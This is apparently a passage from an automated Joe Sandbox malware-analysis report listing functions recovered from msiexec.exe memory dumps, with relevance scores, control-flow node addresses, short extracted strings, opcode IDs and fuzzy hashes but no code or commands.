                                                        • Instruction ID: 1f187c3dc39e826b60a09de8e755b4f580ed67e43bb9808a317febba2041db97
                                                        • Opcode Fuzzy Hash: 1a90e965bc6fe01ca399c6391ff547445303b14f5d031985d8ddcde19be83ad2
                                                        • Instruction Fuzzy Hash: A5214AB18002598FCB10DFAAC4447EEFBF5AF49310F14845AE458A7350D738A944CFA1
                                                        Function 2766C709 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 685 2766c709-2766c755 688 2766c757-2766c75f 685->688 689 2766c76d-2766c790 685->689 688->689 693 2766c792-2766c79a 689->693 694 2766c7a8-2766c7f1 689->694 693->694 701 2766c7fb-2766c819 694->701 704 2766c845-2766c861 701->704 705 2766c81b-2766c83e 701->705 710 2766c863-2766c886 704->710 711 2766c88d-2766c8a8 704->711 705->704 710->711 716 2766c8d3-2766c8ee 711->716 717 2766c8aa-2766c8cc 711->717 722 2766c913-2766d03d 716->722 723 2766c8f0-2766c90c 716->723 717->716 723->722
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq
                                                        • API String ID: 0-3720491408
                                                        • Opcode ID: 1b62a53b4e457f29aa43ec5957590682a6d12eaede19ad16fd38b0e17903bf9f
                                                        • Instruction ID: ddd28299ab75246cfec97a6bd9c62e30fbcff1ba3b41dcc028b9b0fa07b85be3
                                                        • Opcode Fuzzy Hash: 1b62a53b4e457f29aa43ec5957590682a6d12eaede19ad16fd38b0e17903bf9f
                                                        • Instruction Fuzzy Hash: 00517D30B145168FDB54DB79C950B6EB7F6AB88600F508429990AEB364EE78EC01CB91
                                                        Function 27665800 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 728 27665800-2766581b 729 2766581d-27665820 728->729 730 27665822-2766583e 729->730 731 27665843-27665845 729->731 730->731 732 27665847 731->732 733 2766584c-2766584f 731->733 732->733 733->729 735 27665851-27665877 733->735 740 2766587e-276658ac 735->740 745 27665923-27665947 740->745 746 276658ae-276658b8 740->746 752 27665951 745->752 753 27665949 745->753 750 276658d0-27665921 746->750 751 276658ba-276658c0 746->751 750->745 750->746 754 276658c4-276658c6 751->754 755 276658c2 751->755 753->752 754->750 755->750
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHjq
                                                        • API String ID: 0-751881793
                                                        • Opcode ID: 6baab3a4fc4ed71916f9ab9992a4436136bd5dd0b01ab2e56109e6a4bb0455ed
                                                        • Instruction ID: d46e699c48ddfb65fd3334f3bd6105e6d33620a9e02a2b186f6ec2ab9d2bb295
                                                        • Opcode Fuzzy Hash: 6baab3a4fc4ed71916f9ab9992a4436136bd5dd0b01ab2e56109e6a4bb0455ed
                                                        • Instruction Fuzzy Hash: C731DE30B042258FCB099B34C95966F7BA7AF89A50F60852CD506DB396EF79DC05CB90
                                                        Function 27666E71 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: UcTu
                                                        • API String ID: 0-1774077974
                                                        • Opcode ID: 8722512cd3bc0fcdf74388e5fdc00aa892d982bf3dc57af4696f3ce54e44fb5f
                                                        • Instruction ID: b83a75d43fd9d291ee2349d7576610f1bc447681e4a870ecdf214bbdec50fab1
                                                        • Opcode Fuzzy Hash: 8722512cd3bc0fcdf74388e5fdc00aa892d982bf3dc57af4696f3ce54e44fb5f
                                                        • Instruction Fuzzy Hash: 3221C5B5905659AFCB00CF9AD884ADEFBB4FF49310F50821AE918A7240C3746550CFE5
                                                        Function 27666E78 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: UcTu
                                                        • API String ID: 0-1774077974
                                                        • Opcode ID: 2df4820af9f784b72e988b48daeac68102fb25701a73dfdc7a46d33f393e2227
                                                        • Instruction ID: 98ea3011e11d70d4e5b86d52a15942e2b89a65369201997f72ed8320bac0b2fa
                                                        • Opcode Fuzzy Hash: 2df4820af9f784b72e988b48daeac68102fb25701a73dfdc7a46d33f393e2227
                                                        • Instruction Fuzzy Hash: 2711B3B5D01259AFCB00DF9AD884ADEFBB4FF49310F50812AE918A7200C3786954CBE5
                                                        Function 2766962A Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: '
                                                        • API String ID: 0-1997036262
                                                        • Opcode ID: 06d57f6bd6f8e7c4eab65159d38e5841a08b61d6a275924742c66ff9a94be9cb
                                                        • Instruction ID: 92cf5d2ebaa8818c9df0c39661b01c0c8bd98feb56581cd2feef7a6cf20ee5d5
                                                        • Opcode Fuzzy Hash: 06d57f6bd6f8e7c4eab65159d38e5841a08b61d6a275924742c66ff9a94be9cb
                                                        • Instruction Fuzzy Hash: 3AE0D871A09348EFEB00DA7089497497BADDB03204F1084EAD80CDB143D27ADA05C751
                                                        Function 2766A2D0 Relevance: .3, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22ee147fac0a611c144af517b665737b58a68d1cab08456b8c3a8858c91e7a1a
                                                        • Instruction ID: 7282345638ef62235d685c424c87968d4174b6c652b724786fad1c0261780f8d
                                                        • Opcode Fuzzy Hash: 22ee147fac0a611c144af517b665737b58a68d1cab08456b8c3a8858c91e7a1a
                                                        • Instruction Fuzzy Hash: A0A14A70A00214CFCB14DF68D648A5DB7F6EF84314F948869E40AEB365DB7AED85CB84
                                                        Function 276693A8 Relevance: .2, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b9d33ef6a2079da514472ecc627dc3084e0f50f6d9944eaa5618c7977d066669
                                                        • Instruction ID: 31d359895f994c5808f0557c048e095043f8b96618e42d37f0b5ff6376b5f94e
                                                        • Opcode Fuzzy Hash: b9d33ef6a2079da514472ecc627dc3084e0f50f6d9944eaa5618c7977d066669
                                                        • Instruction Fuzzy Hash: EF61B471F002214BDB04AA7EC88465FBADBEFD4610B564439E80ADB379DE79DD0287D1
                                                        Function 27667490 Relevance: .2, Instructions: 227COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db2168bf759afa77714a33cb99f62108e1fc345d75fd4608c53df8f57f3d8042
                                                        • Instruction ID: 6b30639a100df0c3440cb39cf2d958e3507b870492e85cbe9337ba5e2f405fc8
                                                        • Opcode Fuzzy Hash: db2168bf759afa77714a33cb99f62108e1fc345d75fd4608c53df8f57f3d8042
                                                        • Instruction Fuzzy Hash: 30813D70B102068BDB44DFB8C55875EB7F6AF84300F608529D50AEB399EE78EC468B51
                                                        Function 276677C8 Relevance: .2, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9c508aba5db7fba71c0660738fd12112529ee26f99a84b9e08915f92b41ec7c
                                                        • Instruction ID: 87147a4edaa117b46f90ea8757918fa16b02af8a18b95f4bc7cd10f6bb35f80f
                                                        • Opcode Fuzzy Hash: c9c508aba5db7fba71c0660738fd12112529ee26f99a84b9e08915f92b41ec7c
                                                        • Instruction Fuzzy Hash: 7B912C70E0061ACBDB10DF68C890B9DB7B1FF89310F608699D549BB295DB74AE85CF90
                                                        Function 27667098 Relevance: .1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d3a12d75c21256b66519cdf31804806354fb0bcd28fdbacbc2322d6c41f900d
                                                        • Instruction ID: 7fb721d5441dd01a4d562b7af86198ad3382147c7dd3867ab927f3cc68d1e0fa
                                                        • Opcode Fuzzy Hash: 2d3a12d75c21256b66519cdf31804806354fb0bcd28fdbacbc2322d6c41f900d
                                                        • Instruction Fuzzy Hash: F0217CB5E102169FDB05CF79D980AAEBBF2AB48710F144065E906E7354DB38ED41CFA1
                                                        Function 276670A8 Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c32bd0ce39fd86c5fa5adf63df2f92c18f0a0f7d7283fe4bb99d4bbceda91176
                                                        • Instruction ID: 285f0c7741b296b49f56603c9631bee5efc94a7fbe0cf484b5ab1473dbb71e75
                                                        • Opcode Fuzzy Hash: c32bd0ce39fd86c5fa5adf63df2f92c18f0a0f7d7283fe4bb99d4bbceda91176
                                                        • Instruction Fuzzy Hash: 14217AB5A102069FDB05CF79C980AAEB7F1EB48200F144026E906E7390EA38ED41CBA0
                                                        Function 2766A2C2 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d343d819445974048b3631a8963db1aae61d4d3116f0ebe6b766bcb02319c9f1
                                                        • Instruction ID: d31a3e3cd354e3b48880c4f13139cb17afa3de7296dd8dd79044fcdc200dc64b
                                                        • Opcode Fuzzy Hash: d343d819445974048b3631a8963db1aae61d4d3116f0ebe6b766bcb02319c9f1
                                                        • Instruction Fuzzy Hash: F721D530F001149BCB04DA69D558A8EB7B7EF84320F908425E406E7351DF3AED81CBC8
                                                        Function 02FAD044 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3340600787.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2fad000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76364af0248f6cf95f2508c8512050bfc07ca8b9fb1bd95fb197ef8282994a0c
                                                        • Instruction ID: d6e3e885925b12acfe1428d0bd1ae620040425c3e0e94a8f8cac42f1e8489349
                                                        • Opcode Fuzzy Hash: 76364af0248f6cf95f2508c8512050bfc07ca8b9fb1bd95fb197ef8282994a0c
                                                        • Instruction Fuzzy Hash: 702176B1604204DFDB10CF24C9D1B22BF65FB88754F20C96DEA490B74AC73AD446CB62
                                                        Function 276671B8 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc5acf3300ff4bcfbccaea4fad5ca34f23d35f660c060b8ddf67e2c956acb5df
                                                        • Instruction ID: 66740bcb75c941e7f50909857774a3f46813086c67848c4cdd888999f362aa1a
                                                        • Opcode Fuzzy Hash: fc5acf3300ff4bcfbccaea4fad5ca34f23d35f660c060b8ddf67e2c956acb5df
                                                        • Instruction Fuzzy Hash: C311C831B141198BCB559A78CC18AAF73FBEBC8710F10413AD806E7358DE78DD028B91
                                                        Function 2766BFD1 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee8feca06934d19d31cc2e699ea19ca8cb3954d72aced31864219263b8118710
                                                        • Instruction ID: aaa0f698a9e68b8e6dff7f2ecbecea552ce1ac8c04855895bc29e0c9abb3d571
                                                        • Opcode Fuzzy Hash: ee8feca06934d19d31cc2e699ea19ca8cb3954d72aced31864219263b8118710
                                                        • Instruction Fuzzy Hash: C811C230B052158BDF149B24DA5575AB7B7EB89310F4004BAD90EDB345EF3AAE418FD2
                                                        Function 276671A8 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 107fd0297b19ef3b4adf7c37b3f89769b87ec05ba051873652bf4ff8dd792d78
                                                        • Instruction ID: d03be636a0098e0783fd0cd52c967b0788762ffaff896879a6f4a0638a2ec549
                                                        • Opcode Fuzzy Hash: 107fd0297b19ef3b4adf7c37b3f89769b87ec05ba051873652bf4ff8dd792d78
                                                        • Instruction Fuzzy Hash: B701F732F280264BDB4589788C146EF73EBDBC8310F10413AD806D7348EE68CD438792
                                                        Function 02FAD03F Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3340600787.0000000002FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FAD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2fad000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03232167ac8f7e319cb50f154c189f98083e7f90aa4986befa8cdd387345a912
                                                        • Instruction ID: 55c123e782b5f8b6324b68d84099ca29197dfa721b65bf8364b42001ed78f274
                                                        • Opcode Fuzzy Hash: 03232167ac8f7e319cb50f154c189f98083e7f90aa4986befa8cdd387345a912
                                                        • Instruction Fuzzy Hash: DC11DDB5904284CFDB12CF10C9D4B15BFA2FB88314F24CAADE9494B656C33AD44ACF62
                                                        Function 2766D8C7 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 755aa5f7102342904cb0bd58efd833bedfe9844b2407f3649d23e134ffaf8c60
                                                        • Instruction ID: 343e9c8dca14457454bab4b760c5410d2c4f77243c026d17bcf5f859c249983d
                                                        • Opcode Fuzzy Hash: 755aa5f7102342904cb0bd58efd833bedfe9844b2407f3649d23e134ffaf8c60
                                                        • Instruction Fuzzy Hash: D201DF317046149FCB059A7ED854B1AB3DAEB85724F908538E90AC7352EE29EC01C781
                                                        Function 27667400 Relevance: .1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41e6115613361c03cbb904141526bae1889301f297a58e12fb044b5506d3a3c1
                                                        • Instruction ID: feadcfd545d4326180d3a18e01c7a4926100871113f073d271769476568a6934
                                                        • Opcode Fuzzy Hash: 41e6115613361c03cbb904141526bae1889301f297a58e12fb044b5506d3a3c1
                                                        • Instruction Fuzzy Hash: E401A9317000119BD7159ABD8898B1FB6DFCBC8720F608439E20EC7356DD69DC0683C4
                                                        Function 2766D8D8 Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 384fbf43f724581f0a0d26ade654daadce5ce805f9da90adc9bf1df2a7df3f3a
                                                        • Instruction ID: dc43415d65429e0bb94f942e22bf697b7064e0101fb6355097427185a8f8f7dd
                                                        • Opcode Fuzzy Hash: 384fbf43f724581f0a0d26ade654daadce5ce805f9da90adc9bf1df2a7df3f3a
                                                        • Instruction Fuzzy Hash: E3018C317001159BDB149A7ED854B1AB3DAEB89720F908938E50BC7355EE29ED01C781

                                                        Non-executed Functions

                                                        Function 2766AC58 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-3810553869
                                                        • Opcode ID: ed6451d91ba7be30ab87a8c1c03cd5f22fb432418090b8d97bf4a3d8769a9059
                                                        • Instruction ID: 18c037d07b1a7429dea779ddecabc060f3e545a4cf91cf539ce8080ba38baf53
                                                        • Opcode Fuzzy Hash: ed6451d91ba7be30ab87a8c1c03cd5f22fb432418090b8d97bf4a3d8769a9059
                                                        • Instruction Fuzzy Hash: B4123A30A0021ACFDB14DF75C994A9EB7F7BF89301F608569D50AAB265DB35AD81CF80
                                                        Function 02FDF2CC Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3340802205.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2fd0000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHjq
                                                        • API String ID: 0-751881793
                                                        • Opcode ID: 0dd7658d163eb7c6dee20dab002bc588ade47d69518a8e2cb766c131e7fbfaa1
                                                        • Instruction ID: bc37a76f7bbe9e3379f40507d152c30842c234d176af2a47257d8cee7d02859b
                                                        • Opcode Fuzzy Hash: 0dd7658d163eb7c6dee20dab002bc588ade47d69518a8e2cb766c131e7fbfaa1
                                                        • Instruction Fuzzy Hash: A5214A31F4020ACBEB259F61D554A6EBBB3BF44784F288A29C513D7650DF34D802CB91
                                                        Function 2766DF00 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-666546452
                                                        • Opcode ID: 7978aad33898eb5b2541a89a85b4b9af011f897eb40361ba782f5cddf0c76818
                                                        • Instruction ID: bdfb9609ec873dcf81470738322955219f96a32b451a4025564c3c6bde2d3645
                                                        • Opcode Fuzzy Hash: 7978aad33898eb5b2541a89a85b4b9af011f897eb40361ba782f5cddf0c76818
                                                        • Instruction Fuzzy Hash: C4915B30A00209DFDB14DFA5D998BAEBBB7BF44341F908529E801A7294DB78ED41CB90
                                                        Function 2766A658 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                        • API String ID: 0-3356825164
                                                        • Opcode ID: c262f07d41a507460665491528582f150ae9081ab56a1223d256ee296c672b51
                                                        • Instruction ID: 86503f4ef6ac509b73d6a5d27902ee6f81f7d2f9083aff20e9bdcde76004159c
                                                        • Opcode Fuzzy Hash: c262f07d41a507460665491528582f150ae9081ab56a1223d256ee296c672b51
                                                        • Instruction Fuzzy Hash: ADF15D30A10209CFDB05EB64C994A5EB7B7FF84340F648569D9069B369CF79EC82CB85
                                                        Function 2766B990 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq
                                                        • API String ID: 0-2428501249
                                                        • Opcode ID: 00b52a417977d0e89de18efc643483e0698bfd5c77711db9185c9bb01ba71b8b
                                                        • Instruction ID: 04a00032b2313d8559eddf34df1fd051a1fed0f3ad34e06a3fdfdc3d37e84826
                                                        • Opcode Fuzzy Hash: 00b52a417977d0e89de18efc643483e0698bfd5c77711db9185c9bb01ba71b8b
                                                        • Instruction Fuzzy Hash: BDB13A30A00209CFDB14EF65C994A5EB7B7EF84301F648529D50A9B3A5DF78ED82CB80
                                                        Function 2766BDA8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRjq$LRjq$$jq$$jq
                                                        • API String ID: 0-2974078839
                                                        • Opcode ID: c72ba31b6d46dcef3c4b5883c21d415ec6f68bc20571ea90f62efb5767de438a
                                                        • Instruction ID: 9620b51e6d38311179c02ce4fd4adcc012d8781baeb81ea3a98e064b01976858
                                                        • Opcode Fuzzy Hash: c72ba31b6d46dcef3c4b5883c21d415ec6f68bc20571ea90f62efb5767de438a
                                                        • Instruction Fuzzy Hash: ED516D34710202CFDB08DB28C994E5EB7A6EF85704F648569E60A9B3A5DF78EC44CB91
                                                        Function 2766E288 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3359760575.0000000027660000.00000040.00000800.00020000.00000000.sdmp, Offset: 27660000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_27660000_msiexec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $jq$$jq$$jq$$jq
                                                        • API String ID: 0-2428501249
                                                        • Opcode ID: 0eba6c4815780ac9994baeca9305d8bb1abd64cbec9345ec30a1727c6b9617e6
                                                        • Instruction ID: b87a31e7dcb6b02919aca99356bf4687537ddf98c3574734a074367a314e5172
                                                        • Opcode Fuzzy Hash: 0eba6c4815780ac9994baeca9305d8bb1abd64cbec9345ec30a1727c6b9617e6
                                                        • Instruction Fuzzy Hash: 6D518930A10204CFCB15DBB4D984A9EB3B7FF89311FA48529D906AB355DB38ED45CB91